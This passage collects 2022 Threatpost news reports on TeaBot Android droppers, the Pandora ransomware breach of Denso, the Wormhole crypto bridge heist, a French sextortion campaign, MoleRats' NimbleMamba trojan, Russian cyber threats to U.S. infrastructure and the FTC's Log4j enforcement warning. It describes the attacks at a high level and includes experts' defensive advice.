This tactic appears to be effective. In January, an app called QR Code Reader – Scanner App [was distributing](<https://threatpost.com/fbi-malicious-qr-codes/177902/>) 17 different TeaBot variants for a little over a month. It managed to pull in more than 100,000 downloads by the time it was discovered.

Other TeaBot droppers – [discovered](<https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html>) by Dutch security firm ThreatFabric last November – have been packaged under many names, such as QR Scanner 2021, PDF Document Scanner and CryptoTracker. The latest, [according](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>) to security firm Cleafy, was QR Code & Barcode – Scanner.

## Why Can’t TeaBot Be Stopped?

App stores have [policies](<https://www.google.com/about/unwanted-software-policy.html>) and protections aimed at combating malware. Google Play Protect, for example, helps [root out](<https://support.google.com/googleplay/answer/2812853?hl=en>) malicious apps before they’re installed and [scans](<https://developers.google.com/android/play-protect/client-protections>) for evidence of misdoing on a daily basis.

However, TeaBot droppers aren’t obviously malicious. They might seem perfectly uninteresting, at least on the surface.

Once a user opens one of these nondescript apps, they’re prompted to download a software update. The update is, in fact, a second app containing a malicious payload.

If the user gives the app permission to install software from an unknown source, the infection process begins. Like other Android malware, TeaBot then attempts to abuse Accessibility Services. [Such attacks](<https://threatpost.com/alien-android-2fa/159517/>) use an advanced remote access feature that abuses the TeamViewer application – a remote access and desktop sharing tool – giving the bad actor behind the malware remote control over the victim’s devices.

The ultimate goal of these attacks is to retrieve sensitive information such as login credentials, SMS and 2FA codes from the device’s screen, as well as to perform malicious actions on the device, the report said.

## Here’s How TeaBot _Can_ Be Stopped

TeaBot attacks have grown fast. As Cleafy notes, “In less than a year, the number of applications targeted by TeaBot have grown more than 500%, going from 60 targets to over 400.”

What can be done to stop them?

“Real-time scanning of app downloads – even if the app doesn’t originate from Google Play – would help to mitigate this issue,” Shawn Smith, director of infrastructure at nVisium, told Threatpost on Wednesday via email, adding that “additional warning messages when installing app add-ons that aren’t on Google Play could be useful, too.”

Leo Pate, managing consultant at nVisium, also told Threatpost via email on Wednesday that “Google could be implementing checks on permissive permissions for applications to run, obtaining lists of specific hardcoded public IPs and domain names. Then, [Google could run] them through various sources to see if they’re ‘bad.’”

Until app stores have fixed the problem with droppers, users will have to remain alert, Schless noted. “Everyone knows that they should have antivirus and anti-malware apps on their computers, and our mobile devices shouldn’t be treated any differently.”

[Source: Threatpost, “TeaBot Trojan Haunts Google Play Store, Again,” published 2022-03-02](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>)

# Pandora Ransomware Hits Giant Automotive Supplier Denso

A multibillion supplier to key automotive companies like Toyota, Mercedes-Benz and Ford confirmed Monday that it was the target of a cyberattack over the weekend – confirmation that came after the Pandora ransomware group began leaking data that attackers claimed was stolen in the incident.

The
attack on Japan-based Denso occurred at a company office in Germany, which was “illegally accessed by a third party on March 10,” the company said in [a press statement](<https://www.denso.com/global/en/news/newsroom/2022/20220314-g01/>) on its website.

“After … detecting the unauthorized access, Denso promptly cut off the network connection of devices that received unauthorized access and confirmed that there is no impact on other Denso facilities,” the company said in the statement.

Denso is one of the world’s largest suppliers of automotive components – including powertrain control and electronics parts – to top automobile brands such as Toyota, Mercedes-Benz, Ford, Honda, Volvo, Fiat and General Motors. The Japan-based supplier reported $44.6 billion in revenue last year and has more than 200 subsidiaries with 168,391 employees worldwide.

Denso is currently investigating the incident with appropriate authorities and production continues at “all plants as usual,” according to the statement.

## **Toyota Data Leaked**

However, classified information from Toyota stolen in the attack on Denso already has been leaked on the dark web by Pandora, according to Japanese security firm Mitsui Bussan Secure Directions.

The company told [Japanese news outlet NHK](<https://www3.nhk.or.jp/nhkworld/en/news/20220313_23/>) that Pandora posted a message on the dark web on Sunday afternoon, Japan time, claiming to have stolen more than 157,000 items amounting to 1.4 terabytes of data belonging to the Toyota Motor group. This is the second time in a few weeks that Toyota has been hit: In late February, the car maker was forced to [close down](<https://threatpost.com/toyota-to-close-japan-plants-after-suspected-cyberattack/178686/>) its Japan plants after a suspected cyberattack.

On Saturday, Eastern time, the dark-web criminal intelligence firm DarkTracer [tweeted](<https://twitter.com/darktracer_int/status/1502871181556211721>) a screenshot of the Denso listing on Pandora’s leak portal. Reports said that the dump includes purchase orders, emails, non-disclosure agreements, technical drawings and other classified information.

> [ALERT] Pandora gang has announced "DENSO" on the victim list. [pic.twitter.com/kh9wzGV1io](<https://t.co/kh9wzGV1io>)
>
> — DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) [March 13, 2022](<https://twitter.com/darktracer_int/status/1502871181556211721>)

On Monday, DarkTracer [added](<https://twitter.com/darktracer_int/status/1503521358436872193>) that the Rook gang listed Denso on its victim list a few months ago, in December 2021.

> DENSO was listed on the victim list by ROOK in December 2021 and Pandora ransomware gang in March 2022. [pic.twitter.com/tFcRP0iSx3](<https://t.co/tFcRP0iSx3>)
>
> — DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) [March 15, 2022](<https://twitter.com/darktracer_int/status/1503521358436872193>)

It’s unclear at this time whether Pandora managed to encrypt files before the most recent attack was detected, or how much ransom, if any, is being demanded, according to reports. The one-two punch of encrypting files and then threatening to leak (or actually leaking) them is a known ransomware tactic dubbed [“double extortion.”](<https://threatpost.com/mount-locker-ransomware-changes-tactics/165559/>)

## **Supply-Chain Under Attack**

The Denso attack is the second supply-chain cyber incident that has impacted Toyota this year. In February, [an attack on Toyota supplier Kojima Industries Corp.](<https://threatpost.com/toyota-to-close-japan-plants-after-suspected-cyberattack/178686/>) forced the company to shut down its Japanese plants.

These incidents demonstrate the danger that attacks on the supply chain pose to multinational organizations, and stress the need to maintain and manage the same level of security as the principal company across all partners and business units, one security professional said.

“Cybercriminals will always exploit the weakest link, and in today’s interconnected networks can do significant damage from compromising even a small business unit,” Chris Clements, vice president of solutions architecture at security firm **Cerberus Sentinel**, wrote in an email to Threatpost on Monday. “It’s no longer enough for businesses to solely focus on their ability to prevent or recover from a ransomware attack as attackers now routinely steal mass quantities of data as part of their operations.”

Indeed, the data theft involved in double-extortion attacks can be even more dangerous than a traditional encryption-based ransomware attack, because attackers become unpredictable once they get their hands on sensitive and proprietary information, he noted.

“There is no way to verify that the attacker will actually delete the information instead of attempting to resell it on the dark web or simply release it publicly,” Clements said.

## **Emerging Ransomware Threat**

The Pandora group is relatively new on the ransomware scene, emerging earlier this month as a new player in the threat landscape that uses this dangerous method of double extortion to blackmail targets.

Pandora’s designers built the ransomware to encrypt sensitive files, restricting access to them, and to append the _.pandora_ extension to affected filenames, according [to research](<https://malwarewarrior.com/how-to-remove-pandora-ransomware/>) from Malware Warrior.

Since Pandora is such a new threat, it’s not yet known how cybercriminals breach corporate networks to infect systems with the ransomware. However, clues might be found in previously active ransomware groups and their methods, researchers said.

One security researcher with the Twitter handle pancak3 [believes](<https://twitter.com/pancak3lullz/status/1503201831303983108>) Pandora is a re-branding of [Rook](<https://www.sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk/>) ransomware, which in turn borrows code from [Babuk ransomware](<https://threatpost.com/babuk-ransomware-washington-dc-police/165616/>). That [now-defunct ransomware-as-a-service (RaaS)](<https://threatpost.com/babuk-ransomware-gang-mulls-retirement/165742/>) group – which is likely selling its services for other cybercriminals to use – also used double extortion in its attacks during its heyday.

[Source: Threatpost, “Pandora Ransomware Hits Giant Automotive Supplier Denso,” published 2022-03-15](<https://threatpost.com/pandora-ransomware-hits-giant-automotive-supplier-denso/178911/>)

# Wormhole Crypto Platform: 'Funds Are Safe' After $314M Heist

Wormhole – a web-based blockchain “bridge” that enables users to convert cryptocurrencies – said on Thursday that “all funds are safe” after attackers abused a vulnerability to shake it down for 120,000 Ethereum (approximately $314 million).

In a postmortem shared with Threatpost on Thursday, blockchain security and smart-auditing company CertiK said that its preliminary analysis indicates that “the attacker exploited a mint function on the Solana side of the Wormhole bridge to create 120,000 wETH [wrapped Ethereum] for themselves, then used these minted tokens to claim ETH that was held on the Ethereum side of the bridge.”

As far as negotiation attempts go, CertiK said that the Wormhole team left a message to the attacker stating, “We noticed you were able to exploit the Solana VAA verification and mint tokens. We’d like to offer you a white-hat agreement, and present you a bug bounty of $10 million for exploit details, and return the wETH you’ve minted. You can reach out to us at contact@certus.one.”

Its total on the heist differs a bit from that of Wormhole: CertiK’s analysis showed that the attacker got away with 93,750 ETH ($251 million), 432,662 SOL ($46.6 million) and 4.14 million in USD Coin (USDC) ($4.14 million), for a total of $302,495,717.

This is the [second-largest hack](<https://defiyield.app/rekt-database>) of a decentralized finance (DeFi) platform, second only to the Poly Network (ETH) exploit, in which an attacker ripped off about $602 million.
That attacker reportedly went on to [pay it back](<https://threatpost.com/poly-network-recoups-610m-stolen-from-defi-platform/168906/>), however, after accepting a gig as chief security advisor with Poly Network.

In an early-morning [tweet](<https://twitter.com/wormholecrypto/status/1489233259808571401>) on Thursday, the official Wormhole Twitter account confirmed that it had been raided for 120,000 ETH, but that the vulnerability is now patched.

> 1/2
>
> All funds have been restored and Wormhole is back up.
>
> We're deeply grateful for your support and thank you for your patience.
>
> — Wormhole🌪 (@wormholecrypto) [February 3, 2022](<https://twitter.com/wormholecrypto/status/1489232008521859079>)

Wormhole’s Portal – its token bridge – was back up as of 13:29 UTC, the team said.

## A ‘Rather Common’ Programming Error

Roger Grimes, data-driven defense evangelist for KnowBe4, told Threatpost on Thursday that the attack was successful because of what he called a “rather common” programming error.

“The function inside of the multiple nested smart contracts which was supposed to verify the signature was not coded to ensure the integrity check actually happened,” he explained via email. “So there was no integrity guaranteed in the integrity check. Yeah, that is a problem.”

## Why So Popular?

CertiK said that the bridge’s popularity meant that it had become the dominant bridge between Solana and Ethereum, “and as such was responsible for a large proportion of all wrapped Ethereum on the Solana blockchain.”

020322 14:54 UPDATE: Added CertiK’s analysis of Wormhole’s 1:1 ratio of ETH to wETH.

As CertiK explained in its postmortem, the bridge held a 1:1 ratio of ETH to wETH, “acting essentially as an escrow service.” But the theft broke that 1:1 peg, leading to what CertiK said was “at least 93,750 less ETH held as collateral.”

It didn’t bode well for the financial health of Solana, the firm pointed out. If that ratio hadn’t been regained, DeFi on Solana was at risk of “a mass liquidation event,” according to its analysis.

But given that Wormhole on Thursday indicated that its backers – whoever they may be – had put up the funds necessary to return the peg to a 1:1 backing, the collateralization of wETH on Solana was restored.

All well and good, but still, investors’ gonads shrank in response to the massive heist: The price of Solana, which outpaced both Bitcoin and Ethereum last year, was in [freefall](<https://www.forbes.com/sites/billybambrough/2022/02/03/crypto-price-alert-ethereum-rival-solana-suddenly-in-free-fall-after-huge-325-million-hack/?sh=442f39b04bb5>) Thursday morning. It was selling at $97.69 as of 12:50 ET, down 10 percent since the details of the theft were revealed. Solana had hit a high of $260 in November 2021. Ethereum is also giving investors the hives, having dropped about 5 percent as of the same time on Thursday.

At this point, the full extent of this attack “still remains to be seen,” CertiK said. It could turn out to be a precursor to other attacks, the firm suggested, if, for example, Wormhole’s bridge to a different cryptocurrency – the Terra blockchain – shares the same vulnerability as its Solana bridge.

## Who Bailed Out Wormhole?

The Wormhole team didn’t specify who dug into what must be some seriously deep pockets to back-fill all that money. The Twitterverse, of course, had hypotheses, including that perhaps it was Alameda Research: a cryptocurrency quantitative trading firm and liquidity provider that claims to “manage over $70 million in digital assets and trade around $1 billion per day across thousands of products: all major coins and altcoins, and their derivatives.”

“It was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books),” suggested one Twitter user.

> Alameda probably bailed them out, it was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books)
>
> — ichioku (@1chioku) [February 3, 2022](<https://twitter.com/1chioku/status/1489240858017021956>)

Alameda hasn’t made a public statement on the matter. Wormhole has promised a detailed incident report as soon as possible.

## Crypto’s Cutting Edge Gets a Nasty Cut

Ronghui Gu, co-founder and professor of CertiK, told Threatpost on Thursday that clearly this Wormhole exploit isn’t the first of its kind, and obviously, it won’t be the last.

“We saw another cross-chain bridge exploited less than a week ago, when Qubit Finance lost $80 million,” Gu pointed out, referring to an attack [confirmed](<https://blockworks.co/defi-protocol-qubit-finance-loses-80m-in-hack/>) by the DeFi protocol Qubit Finance on Friday.

The attackers reportedly made off with 206,809 Binance coins through Qubit’s QBridge deposit function, making it the seventh-largest DeFi hack ever.

Expect more of the same when it comes to bridge exploits, Gu said, given insatiable demand for these technologies. “We seem to be at an awkward point where the demand for cross-chain infrastructure is far outpacing the industry’s ability to build services securely,” he told Threatpost via email.

Of course, there’s always the “because that’s where the money is” rationale, Gu noted: “Bridges are an attractive target for hackers: they hold millions of dollars of tokens in what is essentially an escrow contract, and by operating across multiple chains they multiply their potential points of failure.”

Threat actors follow the money, he said, and those on the cutting edge of cryptocurrency technology can get bumped off as a result: “A lot of money goes to the newest, most exciting ecosystems. The price that the most adventurous DeFi explorers pay is a heightened risk of falling victim to these exploits of innovative but ultimately insecure platforms.”

## A Need for Secure Development Lifecycle

Where there is software, there are bugs. Grimes pointed to the attack as a case in point for the need for training in secure development lifecycle (SDL) coding. “SDL teaches developers about common exploitable bugs and how to avoid putting it into their own code,” he explained. “It teaches about using bug checking tools, using coding tools that automatically rule out as many security bugs as they can, and in general, puts security into the whole lifecycle of developing something, be it a traditional program, smart phone app or smart contract.”

But there’s a bigger underlying problem, he noted: Namely, most developers and smart contract creators aren’t trained in SDL and “get little to no training in secure development. So, these sorts of bugs are going to creep in and bad actors are going to take advantage of them.”

One thing to note is that the cryptocurrency world is full of trillions of dollars, but it’s still at the toddler stage. “It is an immature industry using immature code, and like all new industries, it is moving ahead at warp speed, good security be damned,” Grimes said.

It is getting harder for bad actors and bug hunters to find really good exploits in Microsoft Windows, Macs, Linux and Google ChromeOS because these platforms are maturing, which makes them tougher to pull apart, he said. That maturity includes experienced coders, tooling and the protective mechanisms of the operating systems themselves.

Not so with the cryptocurrency world, Grimes said, which is the mirror opposite.

“It is built on very secure protocols and algorithms, but then a lot of very immature and buggy applications are built on top of it,” he observed.

He compared it to putting your door key in your potted plant in front of the door: “Sometimes all a thief has to do is look. And that is what hackers exploiting cryptocurrency are doing. They are taking their traditional methods for hunting bugs and using them against immature cryptocurrency applications. And voila, they are finding lots of exploitable bugs.”

And once the money’s gone bye-bye, it’s tough to claw it back. “The exploits always result in stolen money, which are hard to track to and [identify], and almost always impossible to reverse, even if you are watching it in real time,” Grimes said.

He predicted that after suffering billions of dollars in pain, the cryptocurrency world “will mature and it will become harder for hackers to find the easy pickings.”

Too bad the lessons are so painful, Grimes said: “You always hope that when the next cool digital thing happens that we will better apply the security lessons learned from the previous platforms. But we always seem to want there to be more digital blood on the ground than there needs to be. We always, over and over, want to learn the hard way. Each new computing platform is like we have learned nothing at all.”

[Source: Threatpost, “Wormhole Crypto Platform: 'Funds Are Safe' After $314M Heist,” published 2022-02-03](<https://threatpost.com/wormhole-crypto-funds-safe-heist/178189/>)

# Sextortion Rears Its Ugly Head Again

A new French-language [sextortion campaign](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>) is making the rounds, researchers warn.

As noted by Sophos researchers in a Monday
[report](<https://nakedsecurity.sophos.com/2022/02/21/french-cybercriminals-using-sextortion-scams-with-no-text-or-links/>), sextortion is one of the oldest tricks in the book, but its popularity has waned in recent years due to effective cybersecurity, law enforcement crackdowns and the rise of ransomware.

This new campaign is one signal of what may be a resurgence, they said.

## Threats Sandwich Malware Links

The new French-language attack entails a blind email blast, shown below, with unsubstantiated claims of video evidence and so on. It cites France’s legal penalties for watching illegal pornography, then tells the reader: “If you wish, you may reply to the address below to explain away your actions, so that we can evaluate your explanation and determine if charges should be brought. You have a strict deadline of 72 hours.”

Should the reader not comply, “we will are [sic] obliged to send our report to the Public Prosecutor to issue an arrest warrant against you. We will proceed to have you arrested by the police closest to your place of residence.”

Notably, the malicious email contains no plaintext or hyperlinks. Instead, its text is displayed in an image file.

[Figure: French-language sextortion threat email. Source: Sophos.](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/23114449/French-sextortion-threat-email-e1645634734663.png>)

Attackers normally use hyperlinks to trick unwitting victims into downloading malware or visiting malicious webpages; this campaign gives that up in exchange for evading filters. As Sophos explains, “Adding an image that holds the call-to-action text obviously makes it harder for a recipient to reply, because a plain image can’t contain clickable links, or even text that can be copied and pasted.”

But, as Mike Parkin – senior technical engineer at Vulcan Cyber – told Threatpost via email, “The fact that most scams end up in our junk mail folder shows how effective email filters have become, which is why they look to alternative methods like embedded PDFs or images rather than raw text or HTML that is easy for the filters to analyze.”

## What is Sextortion?

Sextortion is a form of blackmail in which a malicious actor claims to possess evidence of sexual misbehavior by their victim. The attacker demands payment in exchange for not spreading the compromising information or images.

Sometimes, these campaigns can combine with [botnets](<https://threatpost.com/phorpiex-botnet-shifts-ransomware-sextortion/149295/>), [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>) and other methods of cyber attack to form a potent cocktail. However, as [prior](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) [attacks](<https://threatpost.com/sextortionists-defenses-cryptocurrency-shift/148967/>) have shown, sextortion tends to be rudimentary: Such attacks aren’t targeted. Rather, they entail blind email blasts that prey on victims’ fear, without any actual evidence of sexual impropriety to back them up.

## Sextortion is on the Rise Again

“Scams seem to run in cycles,” notes Parkin. “Whether it’s a Prince from Nigeria, uncollected assets, scam victim compensation, extortion over adult websites you didn’t visit, or whatever. Scammers will use one for a while, then shift to something else when they stop getting responses. Eventually, they’ll circle back to an old scam that may have been updated with new text or a new graphic.”

Lionel Sigal, CTI at CYE, told Threatpost via email that sextortion has recently been skyrocketing: “Sextortion attempts (real and fake) targeting executives of organizations have increased by 800% in the last 4 months,” he said.

Campaigns targeting ordinary individuals are also spiking: The FBI’s Internet Crime Complaint Center received more than [16,000 sextortion complaints](<https://www.ic3.gov/Media/Y2021/PSA210902>) in only the first seven months of 2021.

Will this old-hat method of cyber attack prove effective? “It’s too early to tell what the hit rate is on this technique,” Casey Ellis, founder and CTO of Bugcrowd, told Threatpost via email, “but it feels to me like a pivot that people would fall for. If a scam has a take of $500 and it costs 1 cent to send an email, you only have to connect 1 in 50,000 times for the scam to break even.”

To Parkin, “the best defense is solid user education. No matter how successful an attacker is at getting past the filters, their attack can only succeed if the target falls for it and takes the bait.”

[Source: Threatpost, “Sextortion Rears Its Ugly Head Again,” published 2022-02-23](<https://threatpost.com/sextortion-rears-its-ugly-head-again/178595/>)

Known Palestinian threat actor MoleRats is likely behind a recent malicious email campaign targeting Middle Eastern governments, foreign-policy think tanks and a state-affiliated airline with a new intelligence-gathering trojan dubbed NimbleMamba, researchers said.

Researchers from Proofpoint said they have observed a spear-phishing campaign using multiple vectors
since November that they believe is the work of TA402, more [commonly known as](<https://threatpost.com/molerats-apt-espionage-facebook-dropbox/162162/>) MoleRats and linked to the Palestinian Territories, according to a [report](<https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage>) posted online Tuesday.

The campaign uses various phishing lures and includes tactics not only to avoid being detected but also to ensure that its core malware payload only attacks specific targets, Proofpoint researchers wrote in the report. Some of the attacks observed by the team also delivered a secondary payload, a trojan dubbed BrittleBush, they said.

NimbleMamba, delivered as an obfuscated .NET executable using third-party obfuscators, is an intelligence-gathering trojan researchers believe is a replacement for previous malware used by TA402, LastConn.

“NimbleMamba has the traditional capabilities of an intelligence-gathering trojan and is likely designed to be the initial access,” researchers wrote. “Functionalities include capturing screenshots and obtaining process information from the computer. Additionally, it can detect user interaction, such as looking for mouse movement.”

MoleRats is part of the Gaza Cybergang, an Arabic-speaking, politically motivated collective of interrelated threat groups actively targeting the Middle East and North Africa. It’s known for attacks using spyware and other malware aimed at gathering intelligence.

Researchers from Zscaler have already observed MoleRats targeting prominent Palestinians, as well as activists and journalists in Turkey, with spyware [in a previously identified attack](<https://threatpost.com/molerats-apt-spy-bankers-politicians-journalists/177907/>) in January. That campaign used malicious files doctored up to look like legitimate content related to the Israeli-Palestinian conflict.

## **Variations of an Espionage Campaign**

Proofpoint outlined three types of emails using different tactics and URLs aimed at tricking victims into clicking on malicious links to download the ultimate payloads.

One, which they observed in November, shows MoleRats pretending to be the Quora website while using an actor-controlled Gmail account with an actor-controlled domain, they said.

The attack vector demonstrated a hallmark of the campaign, which is to use geofencing to target specific countries with the malicious payload rather than delivering it to everyone who clicks on the email’s malicious link. The email appears to advertise Ugg boots for sale.

“The malicious URL, such as https[:]//www[.]uggboots4sale[.]com/news15112021.php, in the phishing email was geofenced to the targeted countries,” researchers wrote. “If the target’s IP address fits into the targeted region, the user would be redirected to the .RAR file download containing the latest TA402 implant, NimbleMamba. If outside the target area, the user would be redirected to a legitimate news site.”

The second variation, called “Dropbox URL,” was observed in December using “multiple phishing pretenses, including clickbait medical lures and ones allegedly sharing confidential geopolitical information,” researchers wrote.

This variation also used a Gmail account controlled by TA402 to send the email, but shifted to Dropbox URLs to deliver the malicious .RAR files containing NimbleMamba. It also abandoned the use of geofencing, they said.

Moreover, in this variation, researchers noticed that the threat actor also was using the cloud-based file-sharing service Dropbox for malware command and control (C2), which prompted them to notify Dropbox of the malicious activity so they could put an end to it, they said. MoleRats was seen using Dropbox for C2 in its previously identified attacks in January.

The third email used by attackers, observed in December and January, used socially engineered content specifically to lure targets. However, in this variation, MoleRats “slightly adjusted their attack chain by inserting an additional actor-controlled WordPress URL,” researchers wrote.

The WordPress site impersonates a news aggregator of the legitimate news site used in the first campaign variation, and likely redirects to the download site of the malicious .RAR files containing NimbleMamba if someone in the targeted region clicks on the link, researchers said.

“If the source IP address does not align with the target region, the URL will redirect the recipient to a benign website, typically an Arabic-language news website,” they added.

## **NimbleMamba in Depth**

The most frequently delivered payload of the campaign, NimbleMamba, has some similarities to TA402’s previously used deliverable, LastConn, but also some notable differences, researchers observed.

Both executables are written in C#, have base64 encoding within the C2 framework and use the Dropbox API for C2 communication. However, there appears to be little code overlap between the two, they said.

NimbleMamba’s use of guardrails to ensure that all infected victims are within TA402’s target region also is unique, as is its use of the Dropbox API for both C2 as well as exfiltration, researchers wrote in the post.

“The malware also contains multiple capabilities designed to complicate both automated and manual analysis,” they wrote. “Based on this, Proofpoint assesses NimbleMamba is actively being developed, is well-maintained, and designed for use in highly targeted intelligence collection campaigns.”

_Source: Threatpost, [MoleRats APT Flaunts New Trojan in Latest Cyberespionage Campaign](<https://threatpost.com/molerats-apt-trojan-cyberespionage-campaign/178305/>), published 2022-02-09._

The Russian government is exploring “options for potential cyberattacks” on critical infrastructure in the U.S., the White House warned on Monday, in retaliation for
sanctions and other punishments as the war in Ukraine grinds on.

Officials said that the latest intelligence shows cyber-related “preparatory activity” on the part of President Vladimir Putin’s government, though White House deputy national security adviser for cyber and emerging technology Anne Neuberger emphasized that no concrete threat has been identified.

“To be clear, there is no certainty there will be a cyber-incident on critical infrastructure,” she told reporters [during a briefing](<https://thehill.com/homenews/administration/599072-white-house-warns-russia-prepping-possible-cyberattacks-on-us?rl=1>). She added, “There is no evidence of any specific cyberattack that we are anticipating. There is some preparatory activity that we’re seeing and that is what we shared in a classified context with companies who we thought might be affected.”

That observed prep work includes vulnerability scanning and website probing, she added, declining to add any specifics. She noted that officials were holding more detailed classified briefings with organizations they believe could be targeted.

“The current conflict has put cybersecurity initiatives in hyperdrive, and today, industry leaders aren’t just concerned about adversaries breaching critical infrastructure but losing access and control to them,” Saket Modi, co-founder and CEO at Safe Security, said via email.

In tandem with the briefing, the White House released a cyber-preparedness fact sheet, and President Joe Biden [issued the following statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/>):

_“I have previously warned about the potential that Russia could conduct malicious cyber activity against the United States, including as a response to the unprecedented economic costs we’ve imposed on Russia alongside our allies and partners. It’s part of Russia’s playbook. Today, my Administration is reiterating those warnings based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks.”_

The [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/fact-sheet-act-now-to-protect-against-potential-cyberattacks/>) contains basic advice for hardening cyber-defenses, including employee awareness education; implementing multifactor authentication; keeping patching up-to-date; ensuring backups for data; turning on encryption; red-team exercises; and updating security tools.

“This is a call to action and a call to responsibility for all of us,” Neuberger said, again citing a “potential shift in intention” by Russia.

## **Organizations Are Not Prepared for Russian Attacks**

Jason Rebholz, CISO at Corvus Insurance, noted that basic cyber-hardening should have begun long ago.

“The White House’s best practices echo security fundamentals – something every organization should strive for,” he said via email. “For many organizations, the time to implement was several years ago, as the frequency and severity of attacks began to escalate. Like planting a tree, the best time to secure your organization was ten years ago. The next best time is today. Organizations that have not addressed the key items and hardened their cyber-defenses are at a significantly greater risk of compromise.”

Beyond the basics, there are other challenges in being prepared for an onslaught from Russia’s [considerable cyber-arsenal](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>), Modi said.

“While governments and businesses have started pivoting towards proactive cybersecurity, it is difficult to do so without addressing the three major challenges in cybersecurity that organizations face,” he explained. “There are too many cybersecurity products that do not communicate with each other, and this siloed approach leads to managing cybersecurity reactively. Finally, despite increased attention on the need for a better disclosure mechanism of cyberattacks, cybersecurity communication continues to be a challenge since it often lacks a business context.”

Meanwhile, Danny Lopez, CEO at Glasswall, pointed out that the real risk involves zero-day exploits and other unknown threats.

“Putin is playing a long game. War is costly both in terms of human and economic terms. If we see a de-escalation of the situation on the ground, we are likely to see an escalation of cyber warfare,” he told Threatpost. “There are no patches for [unknown zero-day] and they wreak havoc within hours, whilst the security services and technology industry tries to catch up. These are extremely dangerous to governments as well as businesses.”

The bottom line is that organizations should assume that attacks are imminent, researchers concluded.

“It is a confusing time that involves two nations that have historically possessed and demonstrated very good skills in the cybersecurity and cybercrime areas,” noted Purandar Das, co-founder and CEO at Sotero, via email. “Countries under duress have and will utilize cyberattacks as a way to retaliate and to get around sanctions. The U.S. being the face of such sanctions and a history of poorly protected infrastructure make it a tempting target. Add all this together and the warnings make a lot of sense.”

_Source: Threatpost, [Russia Lays Groundwork for Cyberattacks on U.S. Infrastructure](<https://threatpost.com/russia-cyberattacks-us-infrastructure/179037/>), published 2022-03-22._

The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data [from the risks
of](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the Log4j vulnerabilities, it [warned](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) on Tuesday.

“The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,” according to the warning.

Those companies that bungle consumer data, leaving vulnerabilities unpatched and thus opening the door to exploits and the resulting possible “loss or breach of personal information, financial loss and other irreversible harms,” are risking consequences tied to weighty laws that have resulted in fat fines, the FTC said.

It mentioned, among others, the [Federal Trade Commission Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>) and the [Gramm-Leach-Bliley Act](<https://threatpost.com/privacy-regulation-could-be-a-test-for-states-rights/138303/>). The FTC Act, the commission’s primary statute, enables it to seek monetary redress and other relief for conduct injurious to consumers. [Gramm-Leach-Bliley](<https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act>) requires financial institutions to safeguard sensitive data.

“It is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,” the FTC urged.

The FTC means it: Its warning included a reference to the complaints against Equifax, which agreed to pay $700 million to settle actions by the FTC, the Consumer Financial Protection Bureau, and all fifty states over its infamous [2017 data leak](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (consumers’ reaction at the time: [Make it hurt more](<https://threatpost.com/200k-sign-petition-against-equifax-data-breach-settlement/148560/>)).

According to the Equifax complaint, its failure to patch a known vulnerability “irreversibly exposed the personal information of 147 million consumers.” Expect more of the same if your company fails to protect consumer data from exposure as a result of Log4Shell or whatever similar, known vulnerabilities crop up, it said.

The FTC advised companies to use [guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) from the Cybersecurity and Infrastructure Security Agency (CISA) to check if they’re using Apache’s Log4j logging library, which is at the heart of the cluster of vulnerabilities known as [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>).

Companies that find that they are using Log4j should do the following, CISA recommended:

 * Update your Log4j software package to the [most current version](<https://logging.apache.org/log4j/2.x/security.html>).
 * Consult [CISA guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to mitigate this vulnerability.
 * Ensure remedial steps are taken to ensure that your company’s practices do not violate the law. Failure to identify and patch instances of this software may violate [the FTC Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>).
 * Distribute this information to any relevant third-party subsidiaries that sell products or services to consumers who may be vulnerable.

On Dec. 17, CISA issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23. Federal agencies were given five more days – until Dec. 28 – to report Log4Shell-affected products, including vendor and app names and versions, along with what actions have been taken – e.g. updated, mitigated, removed from agency network – to block exploitation attempts.

CISA provides a [dedicated page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for the Log4Shell flaws with patching information and has released a [Log4j scanner](<https://twitter.com/cisagov/status/1473401212468932609?s=12>) to hunt down potentially vulnerable web services.

## The Log4j Fire Rages Unabated

